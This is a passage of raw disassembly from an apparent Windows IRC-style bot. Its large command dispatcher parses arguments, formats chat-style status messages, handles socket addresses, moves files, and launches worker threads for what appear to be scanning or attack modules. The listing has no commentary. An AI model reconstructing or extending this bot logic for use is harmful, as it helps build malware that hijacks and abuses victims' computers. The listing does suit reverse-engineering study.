loc_4073BA: ; CODE XREF: sub_401ACD+58E2�j
push 3Ch
pop ecx
cmp eax, ecx
jbe short loc_4073C7
mov [ebp+var_36C], ecx
loc_4073C7: ; CODE XREF: sub_401ACD+58F2�j
push [ebp+Source] ; Str
call _atoi
cmp eax, 320h
pop ecx
mov [ebp+var_368], eax
jbe short loc_4073E7
mov [ebp+var_368], 320h
loc_4073E7: ; CODE XREF: sub_401ACD+590E�j
or [ebp+var_354], 0FFFFFFFFh
cmp dword_4317F8, ebx
mov [ebp+arg_1C], ebx
jz short loc_40743D
mov [ebp+File], offset dword_4317F8
loc_407400: ; CODE XREF: sub_401ACD+5952�j
mov eax, [ebp+File]
push edi ; Str2
add eax, 0FFFFFFD8h
push eax ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jz short loc_407423
add [ebp+File], 40h
inc [ebp+arg_1C]
mov eax, [ebp+File]
cmp [eax], ebx
jnz short loc_407400
jmp short loc_40743D
; ---------------------------------------------------------------------------
loc_407423: ; CODE XREF: sub_401ACD+5944�j
mov eax, [ebp+arg_1C]
mov ecx, eax
mov [ebp+var_354], eax
shl ecx, 6
mov ecx, dword_4317F8[ecx]
mov [ebp+var_370], ecx
loc_40743D: ; CODE XREF: sub_401ACD+592A�j
; sub_401ACD+5954�j
cmp [ebp+var_370], ebx
jnz short loc_40744F
push offset unk_42AAD4
jmp loc_406E22
; ---------------------------------------------------------------------------
loc_40744F: ; CODE XREF: sub_401ACD+5976�j
mov edi, [ebp+esi+var_7C]
cmp edi, ebx
mov [ebp+Src], edi
jz short loc_40748A
cmp byte ptr [edi], 23h
jz short loc_40748A
push edi ; Format
lea eax, [ebp+var_484]
push 10h ; Count
push eax ; Dest
call __snprintf
push 78h ; Val
push edi ; Str
call _strchr
add esp, 14h
neg eax
sbb eax, eax
neg eax
mov [ebp+var_344], eax
jmp loc_407564
; ---------------------------------------------------------------------------
loc_40748A: ; CODE XREF: sub_401ACD+598B�j
; sub_401ACD+5990�j
cmp [ebp+var_8FF], bl
jnz short loc_4074AC
cmp [ebp+var_8FE], bl
jnz short loc_4074AC
cmp [ebp+var_8EE], bl
jnz short loc_4074AC
push offset unk_42AAA0
jmp loc_406E22
; ---------------------------------------------------------------------------
loc_4074AC: ; CODE XREF: sub_401ACD+59C3�j
; sub_401ACD+59CB�j ...
push 10h
lea eax, [ebp+var_2D0]
pop edi
push eax
lea eax, [ebp+var_2F8]
push eax
mov [ebp+var_2D0], edi
push [ebp+arg_4]
call dword_4CB978 ; getsockname
mov al, [ebp+var_8FF]
push edi ; Args
neg al
sbb eax, eax
and ax, 100h
add eax, 0FFFFh
and [ebp+var_2F4], eax
push [ebp+var_2F4] ; Count
call dword_4CBA60 ; inet_ntoa
push eax ; Source
lea eax, [ebp+var_484]
push eax ; Dest
call _strncpy
add esp, 0Ch
cmp [ebp+var_8EE], bl
jz short loc_40755E
xor eax, eax
cmp [ebp+var_8FF], bl
push 30h ; Ch
setnz al
inc eax
inc eax
mov edi, eax
lea eax, [ebp+var_484]
push eax ; Str
call _strrchr
pop ecx
cmp edi, ebx
pop ecx
mov byte ptr [ebp+File+3], bl
jle short loc_407552
loc_407530: ; CODE XREF: sub_401ACD+5A83�j
cmp eax, ebx
jz short loc_407552
mov byte ptr [eax], 78h
lea eax, [ebp+var_484]
push 30h ; Ch
push eax ; Str
call _strrchr
inc byte ptr [ebp+File+3]
pop ecx
pop ecx
movsx ecx, byte ptr [ebp+File+3]
cmp ecx, edi
jl short loc_407530
loc_407552: ; CODE XREF: sub_401ACD+5A61�j
; sub_401ACD+5A65�j
mov [ebp+var_344], 1
jmp short loc_407564
; ---------------------------------------------------------------------------
loc_40755E: ; CODE XREF: sub_401ACD+5A3B�j
mov [ebp+var_344], ebx
loc_407564: ; CODE XREF: sub_401ACD+59B8�j
; sub_401ACD+5A8F�j
mov eax, [ebp+arg_4]
push [ebp+Format] ; Format
mov [ebp+var_374], eax
mov eax, [ebp+var_4]
mov [ebp+var_34C], eax
mov eax, [ebp+var_8]
mov [ebp+var_348], eax
mov edi, 80h
lea eax, [ebp+var_474]
push edi ; Count
push eax ; Dest
call __snprintf
mov esi, [ebp+esi+var_78]
add esp, 0Ch
cmp esi, ebx
jz short loc_4075B5
loc_4075A2: ; CODE XREF: sub_401ACD+5B0B�j
push esi ; Format
loc_4075A3: ; CODE XREF: sub_401ACD+5AF5�j
lea eax, [ebp+var_3F4]
push edi ; Count
push eax ; Dest
call __snprintf
add esp, 0Ch
jmp short loc_4075E0
; ---------------------------------------------------------------------------
loc_4075B5: ; CODE XREF: sub_401ACD+5AD3�j
mov eax, [ebp+Src]
cmp eax, ebx
jz short loc_4075C4
cmp byte ptr [eax], 23h
jnz short loc_4075C4
push eax
jmp short loc_4075A3
; ---------------------------------------------------------------------------
loc_4075C4: ; CODE XREF: sub_401ACD+5AED�j
; sub_401ACD+5AF2�j
mov esi, offset aF ; "#f"
push offset byte_43DB88 ; Str2
push esi ; Str1
call _strcmp
pop ecx
test eax, eax
pop ecx
jnz short loc_4075A2
mov [ebp+var_3F4], bl
loc_4075E0: ; CODE XREF: sub_401ACD+5AE6�j
cmp [ebp+var_344], ebx
mov eax, offset aRandom ; "Random"
jnz short loc_4075F2
mov eax, offset aSequential ; "Sequential"
loc_4075F2: ; CODE XREF: sub_401ACD+5B1E�j
push [ebp+var_358]
lea ecx, [ebp+var_484]
push [ebp+var_368]
push [ebp+var_36C]
push [ebp+var_370]
push ecx
push eax
lea eax, [ebp+Dst]
push offset unk_42AA38 ; Format
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 0Bh ; int
push eax ; Source
call sub_40B3BA
add esp, 2Ch
mov [ebp+var_364], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_484]
push ebx
push eax
push offset sub_40C600
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_364]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_407680
loc_40766A: ; CODE XREF: sub_401ACD+5BB1�j
cmp [ebp+var_340], ebx
jnz loc_4081AD
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_40766A
; ---------------------------------------------------------------------------
loc_407680: ; CODE XREF: sub_401ACD+5B9B�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_42AA00
jmp loc_408E86
; ---------------------------------------------------------------------------
loc_407691: ; CODE XREF: sub_401ACD+4E42�j
; sub_401ACD+4E59�j
push edi
call sub_40A8F0
push [ebp+arg_18] ; Str
mov [ebp+var_4E0], eax
call _atoi
push [ebp+Src] ; Str
mov [ebp+var_4F0], eax
call _atoi
push [ebp+Source] ; Str
mov [ebp+var_4EC], eax
call _atoi
mov esi, [ebp+arg_4]
push 7Fh ; Count
push [ebp+Format] ; Source
mov [ebp+var_4E8], eax
lea eax, [ebp+var_570]
mov [ebp+var_574], esi
push eax ; Dest
call _strncpy
add esp, 1Ch
mov edi, [ebp+var_4]
mov eax, [ebp+var_8]
mov [ebp+var_4D8], edi
push [ebp+var_4EC]
mov [ebp+var_4D4], eax
push [ebp+var_4F0]
push [ebp+var_4E8]
push [ebp+var_4E0]
call dword_4CBA60 ; inet_ntoa
push eax
lea eax, [ebp+Dst]
push offset asc_42A9B0 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 0Bh ; int
push eax ; Source
call sub_40B3BA
add esp, 24h
mov [ebp+var_4E4], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_574]
push ebx
push eax
push offset sub_40CA1D
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_4E4]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_407786
loc_407770: ; CODE XREF: sub_401ACD+5CB7�j
cmp [ebp+var_4D0], ebx
jnz loc_403D46
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_407770
; ---------------------------------------------------------------------------
loc_407786: ; CODE XREF: sub_401ACD+5CA1�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_42A974
jmp loc_403D37
; ---------------------------------------------------------------------------
loc_407797: ; CODE XREF: sub_401ACD+4E05�j
; sub_401ACD+4E1C�j
push edi ; Str
call _atoi
imul eax, 234h
pop ecx
cmp byte_43E928[eax], bl
jz loc_409644
cmp [ebp+var_C], ebx
jz loc_409644
push [ebp+arg_18] ; Str
call _strlen
push edi ; Str
mov esi, eax
call _strlen
push [ebp+arg_8] ; Str
add esi, eax
call _strlen
add eax, [ebp+var_C]
push [ebp+Src] ; SubStr
lea eax, [eax+esi+2]
push eax ; Str
call _strstr
add esp, 14h
mov esi, eax
lea eax, [ebp+Dst]
push esi
push offset dword_42A968 ; Format
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp esi, ebx
jz loc_409644
push edi ; Str
call _atoi
test eax, eax
pop ecx
jle loc_409644
push edi ; Str
call _atoi
cmp eax, 400h
pop ecx
jge loc_409644
push ebx ; int
lea eax, [ebp+Dst]
push ebx ; int
push eax ; int
push [ebp+arg_18] ; Str
push edi ; Str
call _atoi
imul eax, 234h
pop ecx
push dword_43E91C[eax] ; int
call sub_409869
push edi ; Str
call _atoi
imul eax, 234h
add esp, 18h
cmp byte ptr dword_43E710[eax], 73h
jnz loc_409644
push esi
push edi ; Str
call _atoi
imul eax, 234h
pop ecx
add eax, offset byte_43E928
push eax
push [ebp+arg_18]
push offset aSSS ; "[%s] * %s %s"
jmp loc_407957
; ---------------------------------------------------------------------------
loc_407887: ; CODE XREF: sub_401ACD+4DD7�j
; sub_401ACD+4DEE�j
push edi ; Str
call _atoi
imul eax, 234h
pop ecx
cmp byte_43E928[eax], bl
jz loc_409644
cmp [ebp+var_C], ebx
jz loc_409644
push [ebp+arg_18] ; Str
call _strlen
push edi ; Str
mov esi, eax
call _strlen
push [ebp+arg_8] ; Str
add esi, eax
call _strlen
add eax, [ebp+var_C]
push [ebp+Src] ; SubStr
lea eax, [eax+esi+2]
push eax ; Str
call _strstr
mov esi, eax
add esp, 14h
cmp esi, ebx
jz loc_409644
push edi ; Str
call _atoi
test eax, eax
pop ecx
jle loc_409644
push edi ; Str
call _atoi
cmp eax, 400h
pop ecx
jge loc_409644
push ebx ; int
push ebx ; int
push esi ; int
push [ebp+arg_18] ; Str
push edi ; Str
call _atoi
imul eax, 234h
pop ecx
push dword_43E91C[eax] ; int
call sub_409869
push edi ; Str
call _atoi
imul eax, 234h
add esp, 18h
cmp byte ptr dword_43E710[eax], 73h
jnz loc_409644
push esi
push edi ; Str
call _atoi
imul eax, 234h
pop ecx
add eax, offset byte_43E928
push eax
push [ebp+arg_18]
push offset aSSS_0 ; "[%s] <%s> %s"
loc_407957: ; CODE XREF: sub_401ACD+5DB5�j
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
call sub_409869
add esp, 28h
jmp loc_409644
; ---------------------------------------------------------------------------
loc_407984: ; CODE XREF: sub_401ACD+4DA9�j
; sub_401ACD+4DC0�j
push edi
call dword_4CBA14 ; inet_addr
push [ebp+arg_18] ; Str
mov [ebp+var_680], eax
call _atoi
push [ebp+Src] ; Str
mov [ebp+var_690], eax
call _atoi
mov esi, [ebp+arg_4]
push 7Fh ; Count
push [ebp+Format] ; Source
mov [ebp+var_688], eax
lea eax, [ebp+var_710]
mov [ebp+var_714], esi
push eax ; Dest
call _strncpy
add esp, 14h
mov edi, [ebp+var_4]
mov eax, [ebp+var_8]
mov [ebp+var_678], edi
push [ebp+var_688]
mov [ebp+var_674], eax
push [ebp+var_690]
push [ebp+var_680]
call dword_4CBA60 ; inet_ntoa
push eax
lea eax, [ebp+Dst]
push offset unk_42A910 ; Format
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 0Bh ; int
push eax ; Source
call sub_40B3BA
add esp, 20h
mov [ebp+var_684], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_714]
push ebx
push eax
push offset sub_40C92C
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_684]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_407A66
loc_407A50: ; CODE XREF: sub_401ACD+5F97�j
cmp [ebp+var_670], ebx
jnz loc_403D46
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_407A50
; ---------------------------------------------------------------------------
loc_407A66: ; CODE XREF: sub_401ACD+5F81�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_42AA00
jmp loc_403D37
; ---------------------------------------------------------------------------
loc_407A77: ; CODE XREF: sub_401ACD+4D7B�j
; sub_401ACD+4D92�j
push edi ; Str
call _atoi
push 7Fh ; Count
mov [ebp+var_1130], eax
push [ebp+arg_18] ; Source
lea eax, [ebp+var_1234]
push eax ; Dest
call _strncpy
push [ebp+Src] ; Str
call _atoi
mov esi, [ebp+arg_4]
add esp, 14h
mov [ebp+var_1134], eax
lea eax, [ebp+var_11B4]
push [ebp+Format] ; Format
mov [ebp+var_123C], esi
push 80h ; Count
push eax ; Dest
call __snprintf
mov eax, [ebp+var_8]
add esp, 0Ch
mov edi, [ebp+var_4]
mov [ebp+var_1120], eax
push [ebp+var_1134]
lea eax, [ebp+var_1234]
mov [ebp+var_1124], edi
push eax
push [ebp+var_1130]
push esi
call sub_40AA06
pop ecx
push eax
lea eax, [ebp+Dst]
push offset asc_42A8D4 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 18h ; int
push eax ; Source
call sub_40B3BA
add esp, 24h
mov [ebp+var_112C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_123C]
push ebx
push eax
push offset sub_410DAB
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_112C]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_407B63
loc_407B4D: ; CODE XREF: sub_401ACD+6094�j
cmp [ebp+var_111C], ebx
jnz loc_403D46
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_407B4D
; ---------------------------------------------------------------------------
loc_407B63: ; CODE XREF: sub_401ACD+607E�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_42A890
jmp loc_403D37
; ---------------------------------------------------------------------------
loc_407B74: ; CODE XREF: sub_401ACD+4D4D�j
; sub_401ACD+4D64�j
push 0FFh ; Count
lea eax, [ebp+var_287C]
push edi ; Source
push eax ; Dest
call _strncpy
push 0FFh ; Count
lea eax, [ebp+var_277C]
push [ebp+arg_18] ; Source
push eax ; Dest
call _strncpy
push [ebp+Src] ; Str
mov [ebp+var_2678], ebx
call _atoi
mov [ebp+var_2674], eax
mov eax, [ebp+esi+var_80]
add esp, 1Ch
cmp eax, ebx
jz short loc_407BCD
push 10h ; Radix
push ebx ; EndPtr
push eax ; Str
call _strtoul
add esp, 0Ch
mov [ebp+var_266C], eax
jmp short loc_407BD3
; ---------------------------------------------------------------------------
loc_407BCD: ; CODE XREF: sub_401ACD+60EA�j
mov [ebp+var_266C], ebx
loc_407BD3: ; CODE XREF: sub_401ACD+60FE�j
mov esi, [ebp+esi+var_7C]
cmp esi, ebx
jz short loc_407BEA
push esi ; Str
call _atoi
pop ecx
mov [ebp+var_2670], eax
jmp short loc_407BF0
; ---------------------------------------------------------------------------
loc_407BEA: ; CODE XREF: sub_401ACD+610C�j
mov [ebp+var_2670], ebx
loc_407BF0: ; CODE XREF: sub_401ACD+611B�j
movzx eax, [ebp+var_8FB]
mov esi, [ebp+arg_4]
push 7Fh ; Count
push [ebp+Format] ; Source
mov [ebp+var_2668], eax
lea eax, [ebp+var_28FC]
mov [ebp+var_2900], esi
push eax ; Dest
call _strncpy
mov eax, [ebp+var_4]
add esp, 0Ch
mov [ebp+var_2660], eax
mov eax, [ebp+var_8]
push [ebp+arg_18]
mov [ebp+var_2664], eax
lea eax, [ebp+Dst]
push edi
push offset asc_42A864 ; "-"
push eax ; Dest
call _sprintf
push esi ; int
lea eax, [ebp+Dst]
push 1Dh ; int
push eax ; Source
call sub_40B3BA
add esp, 1Ch
mov [ebp+var_267C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_2900]
push ebx
push eax
push offset sub_4167A0
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_267C]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_407CA1
loc_407C8B: ; CODE XREF: sub_401ACD+61D2�j
cmp [ebp+var_265C], ebx
jnz loc_407196
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_407C8B
; ---------------------------------------------------------------------------
loc_407CA1: ; CODE XREF: sub_401ACD+61BC�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_42A824
jmp loc_407187
; ---------------------------------------------------------------------------
loc_407CB2: ; CODE XREF: sub_401ACD+4D1F�j
; sub_401ACD+4D36�j
push 7Fh
lea eax, [ebp+var_3494]
pop esi
push esi ; Count
push edi ; Source
push eax ; Dest
call _strncpy
push esi ; Count
lea eax, [ebp+var_3414]
push [ebp+arg_18] ; Source
push eax ; Dest
call _strncpy
push esi ; Count
lea eax, [ebp+var_3394]
push [ebp+Src] ; Source
push eax ; Dest
call _strncpy
push esi ; Count
lea eax, [ebp+var_3314]
push [ebp+Format] ; Source
push eax ; Dest
call _strncpy
mov eax, [ebp+var_4]
add esp, 30h
mov esi, [ebp+arg_4]
mov [ebp+var_3290], eax
push [ebp+Src]
mov eax, [ebp+var_8]
mov [ebp+var_328C], eax
lea eax, [ebp+Dst]
push [ebp+arg_18]
mov [ebp+var_3498], esi
push edi
push offset asc_42A7E8 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 12h ; int
push eax ; Source
call sub_40B3BA
add esp, 20h
mov [ebp+var_3294], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_3498]
push ebx
push eax
push offset sub_41561D
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_3294]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_407D89
loc_407D73: ; CODE XREF: sub_401ACD+62BA�j
cmp [ebp+var_3288], ebx
jnz loc_407196
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_407D73
; ---------------------------------------------------------------------------
loc_407D89: ; CODE XREF: sub_401ACD+62A4�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_42A7B0
jmp loc_407187
; ---------------------------------------------------------------------------
loc_407D9A: ; CODE XREF: sub_401ACD+4BF2�j
; sub_401ACD+4C09�j
push 7Fh
lea eax, [ebp+var_306C]
pop esi
push esi ; Count
push edi ; Source
push eax ; Dest
call _strncpy
push esi ; Count
lea eax, [ebp+var_2FEC]
push [ebp+arg_18] ; Source
push eax ; Dest
call _strncpy
push esi ; Count
lea eax, [ebp+var_2F6C]
push [ebp+Src] ; Source
push eax ; Dest
call _strncpy
push esi ; Count
lea eax, [ebp+var_2EEC]
push [ebp+Format] ; Source
push eax ; Dest
call _strncpy
mov eax, [ebp+var_4]
add esp, 30h
mov esi, [ebp+arg_4]
mov [ebp+var_2E68], eax
push [ebp+Src]
mov eax, [ebp+var_8]
mov [ebp+var_2E64], eax
lea eax, [ebp+Dst]
push [ebp+arg_18]
mov [ebp+var_3070], esi
push edi
push offset asc_42A780 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 0Eh ; int
push eax ; Source
call sub_40B3BA
add esp, 20h
mov [ebp+var_2E6C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_3070]
push ebx
push eax
push offset sub_414358
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_2E6C]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_407E71
loc_407E5B: ; CODE XREF: sub_401ACD+63A2�j
cmp [ebp+var_2E60], ebx
jnz loc_407196
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_407E5B
; ---------------------------------------------------------------------------
loc_407E71: ; CODE XREF: sub_401ACD+638C�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_42A748
jmp loc_407187
; ---------------------------------------------------------------------------
loc_407E82: ; CODE XREF: sub_401ACD+4AC9�j
; sub_401ACD+4AE0�j ...
push 7Fh
lea eax, [ebp+var_3CE8]
pop esi
push esi ; Count
push edi ; Source
push eax ; Dest
call _strncpy
push esi ; Count
lea eax, [ebp+var_3C68]
push [ebp+arg_18] ; Source
push eax ; Dest
call _strncpy
push esi ; Count
lea eax, [ebp+var_3BE8]
push [ebp+Src] ; Source
push eax ; Dest
call _strncpy
push esi ; Count
lea eax, [ebp+var_3B68]
push [ebp+Format] ; Source
push eax ; Dest
call _strncpy
push 20h ; Count
lea eax, [ebp+var_3AE8]
push [ebp+arg_8] ; Source
push eax ; Dest
call _strncpy
mov eax, [ebp+var_4]
add esp, 3Ch
mov esi, [ebp+arg_4]
mov [ebp+var_3A68], eax
push [ebp+Src]
mov eax, [ebp+var_8]
mov [ebp+var_3A64], eax
lea eax, [ebp+Dst]
push [ebp+arg_18]
mov [ebp+var_3CF0], esi
push edi
push offset asc_42A718 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 0Dh ; int
push eax ; Source
call sub_40B3BA
add esp, 20h
mov [ebp+var_3CEC], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_3CF0]
push ebx
push eax
push offset sub_4135DF
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_3CEC]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_407F6A
loc_407F54: ; CODE XREF: sub_401ACD+649B�j
cmp [ebp+var_3A60], ebx
jnz loc_407196
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_407F54
; ---------------------------------------------------------------------------
loc_407F6A: ; CODE XREF: sub_401ACD+6485�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_42A6E0
jmp loc_407187
; ---------------------------------------------------------------------------
loc_407F7B: ; CODE XREF: sub_401ACD+4A9B�j
; sub_401ACD+4AB2�j
push 7Fh ; Count
lea eax, [ebp+var_177C]
push edi ; Source
push eax ; Dest
call _strncpy
push [ebp+arg_18] ; Str
call _atoi
push 3Fh ; Count
mov [ebp+var_162C], eax
push [ebp+Src] ; Source
lea eax, [ebp+var_16FC]
push eax ; Dest
call _strncpy
mov esi, [ebp+esi+var_80]
add esp, 1Ch
cmp esi, ebx
jz short loc_407FC6
push 3Fh ; Count
lea eax, [ebp+var_16BC]
push esi ; Source
push eax ; Dest
call _strncpy
add esp, 0Ch
loc_407FC6: ; CODE XREF: sub_401ACD+64E5�j
lea eax, [ebp+var_16FC]
mov [ebp+var_1628], 1
push eax
lea eax, [ebp+var_177C]
push [ebp+var_162C]
push eax
lea eax, [ebp+Dst]
push offset asc_42A6B0 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Dst]
push 1Fh ; int
push eax ; Source
call sub_40B3BA
add esp, 20h
mov [ebp+var_1624], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_1780]
push ebx
push eax
push offset sub_4017ED
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_1624]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_408052
loc_40803C: ; CODE XREF: sub_401ACD+6583�j
cmp [ebp+var_1620], ebx
jnz loc_406BFE
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_40803C
; ---------------------------------------------------------------------------
loc_408052: ; CODE XREF: sub_401ACD+656D�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset dword_42A674
jmp loc_406BEF
; ---------------------------------------------------------------------------
loc_408063: ; CODE XREF: sub_401ACD+4A5B�j
; sub_401ACD+4A72�j
push [ebp+arg_18] ; Str
call _atoi
cmp eax, ebx
pop ecx
mov [ebp+var_1D68], eax
jle loc_408156
mov esi, 80h
push edi ; Format
lea eax, [ebp+var_1EF0]
push esi ; Count
push eax ; Dest
call __snprintf
add esp, 0Ch
xor eax, eax
cmp [ebp+var_8EE], bl
push [ebp+Format] ; Format
setnz al
mov [ebp+var_1D64], eax
mov eax, [ebp+arg_4]
mov [ebp+var_1EF4], eax
lea eax, [ebp+var_1DF0]
push esi ; Count
push eax ; Dest
call __snprintf
mov eax, [ebp+var_4]
add esp, 0Ch
mov [ebp+var_1D60], eax
mov eax, [ebp+var_8]
push [ebp+arg_18]
mov [ebp+var_1D5C], eax
lea eax, [ebp+Dst]
push edi
push offset asc_42A648 ; "-"
push 200h ; Count
push eax ; Dest
call __snprintf
push ebx ; int
lea eax, [ebp+Dst]
push 15h ; int
push eax ; Source
call sub_40B3BA
add esp, 20h
mov [ebp+var_1D70], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_1EF4]
push ebx
push eax
push offset sub_413A29
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_1D70]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_408145
loc_408133: ; CODE XREF: sub_401ACD+6676�j
cmp [ebp+var_1D58], ebx
jnz short loc_4081AD
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_408133
; ---------------------------------------------------------------------------
loc_408145: ; CODE XREF: sub_401ACD+6664�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset unk_42A610
jmp loc_408E86
; ---------------------------------------------------------------------------
loc_408156: ; CODE XREF: sub_401ACD+65A7�j
push offset unk_42A5D8
jmp loc_406E22
; ---------------------------------------------------------------------------
loc_408160: ; CODE XREF: sub_401ACD+4A2D�j
; sub_401ACD+4A44�j
push [ebp+arg_18]
push edi
call ds:dword_4270BC ; MoveFileA
test eax, eax
jz short loc_40818D
push [ebp+arg_18]
lea eax, [ebp+Dst]
push edi
push offset asc_42A5B4 ; "-"
push 200h ; Count
push eax ; Dest
call __snprintf
add esp, 14h
jmp short loc_4081AD
; ---------------------------------------------------------------------------
loc_40818D: ; CODE XREF: sub_401ACD+669F�j
push offset dword_42A5A8
call sub_418699
pop ecx
push eax ; Format
lea eax, [ebp+Dst]
push 200h ; Count
push eax ; Dest
call __snprintf
loc_4081AA: ; CODE XREF: sub_401ACD+548D�j
; sub_401ACD+73C5�j
add esp, 0Ch
loc_4081AD: ; CODE XREF: sub_401ACD+20DC�j
; sub_401ACD+2E89�j ...
cmp [ebp+var_8], ebx
jnz loc_4082DE
push ebx ; int
lea eax, [ebp+Dst]
push [ebp+var_4] ; int
push eax ; int
push [ebp+Format] ; Str
push [ebp+arg_4] ; int
loc_4081CA: ; CODE XREF: sub_401ACD+56E4�j
call sub_409869
add esp, 14h
jmp loc_4082DE
; ---------------------------------------------------------------------------
loc_4081D7: ; CODE XREF: sub_401ACD+49FF�j
; sub_401ACD+4A16�j
push edi ; Format
lea eax, [ebp+var_3F08]
push 104h ; Count
push eax ; Dest
call __snprintf
add esp, 0Ch
cmp [ebp+var_C], ebx
jz short loc_408211
push [ebp+arg_18] ; SubStr
push [ebp+var_C] ; Str
call _strstr
pop ecx
cmp eax, ebx
pop ecx
jz short loc_408211
push eax ; Format
lea eax, [ebp+var_3E04]
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_408211: ; CODE XREF: sub_401ACD+6722�j
; sub_401ACD+6733�j
push [ebp+Format] ; Format
lea eax, [ebp+var_3F88]
push 80h ; Count
push eax ; Dest
call __snprintf
mov eax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_3F8C], eax
mov eax, [ebp+var_4]
mov [ebp+var_3CFC], eax
mov eax, [ebp+var_8]
mov [ebp+var_3CF8], eax
lea eax, [ebp+var_3E04]
push eax
lea eax, [ebp+var_3F08]
push eax
push offset asc_42A578 ; "-"
lea eax, [ebp+Dst]
push 200h ; Count
push eax ; Dest
call __snprintf
push ebx ; int
lea eax, [ebp+Dst]
push 24h ; int
push eax ; Source
call sub_40B3BA
add esp, 20h
mov [ebp+var_3D00], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_3F8C]
push ebx
push eax
push offset sub_417054
push ebx
push ebx
call ds:dword_427084 ; CreateThread
mov ecx, [ebp+var_3D00]
imul ecx, 234h
cmp eax, ebx
mov dword_43E924[ecx], eax
jz short loc_4082C3
loc_4082B1: ; CODE XREF: sub_401ACD+67F4�j
cmp [ebp+var_3CF4], ebx
jnz short loc_4082DE
push 32h
call ds:dword_427080 ; Sleep
jmp short loc_4082B1
; ---------------------------------------------------------------------------
loc_4082C3: ; CODE XREF: sub_401ACD+67E2�j
call ds:dword_427094 ; RtlGetLastWin32Error
push eax
push offset asc_42A53C ; "-"
loc_4082CF: ; CODE XREF: sub_401ACD+909�j
; sub_401ACD+A47�j ...
lea eax, [ebp+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_4082DE: ; CODE XREF: sub_401ACD+7C5�j
; sub_401ACD+930�j ...
push 1
pop esi
jmp loc_406C22
; ---------------------------------------------------------------------------
loc_4082E6: ; CODE XREF: sub_401ACD+49D1�j
; sub_401ACD+49E8�j
push 44h
lea eax, [ebp+var_668]
pop esi
push esi ; Size
push ebx ; Val
push eax ; Dst
call _memset
push 1
mov [ebp+var_668], esi
pop esi
mov [ebp+var_638], bx
push edi ; Str
mov [ebp+var_63C], esi
call _atoi
add esp, 10h
cmp eax, esi
jnz short loc_408323
mov [ebp+var_638], 5
